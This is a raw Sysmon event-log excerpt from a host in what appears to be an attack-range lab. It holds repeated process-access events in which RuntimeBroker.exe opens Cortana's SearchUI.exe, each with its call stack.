13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.633{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 